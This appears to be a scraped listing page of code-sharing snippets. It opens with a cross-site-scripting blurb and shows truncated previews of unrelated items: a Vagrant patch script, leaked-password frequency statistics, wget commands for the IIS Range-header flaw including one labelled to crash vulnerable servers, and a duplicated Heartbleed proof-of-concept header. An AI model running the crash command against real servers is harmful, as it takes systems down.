Stop! This text is only interesting for you if you...
- Like popping alerts in weird situations
- Miss CSS expressions as much as we do
- Have an unhealthy obsession for markup porn
| #!/bin/bash | |
| set -eo pipefail | |
| TARGETFMT='/opt/vagrant/embedded/gems/gems/vagrant-%s/plugins/providers/virtualbox/driver/meta.rb' | |
| die() { echo >&2 "$@"; exit 1; } | |
| [[ $EUID -eq 0 ]] || die "sudo required" |
| Basic Results | |
| Total entries = 118566 | |
| Total unique entries = 98397 | |
| Top 10 passwords | |
| FuckYou = 864 (0.73%) | |
| 123456 = 739 (0.62%) | |
| 123456789 = 677 (0.57%) | |
| NULL = 175 (0.15%) |
| #Use this just to test (Requested Range Not Satisfiable = vulnerable): | |
| wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png | |
| #Use this to BSOD Vulnerable systems: | |
| wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png |
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
| # The author disclaims copyright to this source code. | |
| import sys | |
| import struct | |
| import socket | |
| import time | |
| import select |
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
| # The author disclaims copyright to this source code. | |
| import sys | |
| import struct | |
| import socket | |
| import time | |
| import select |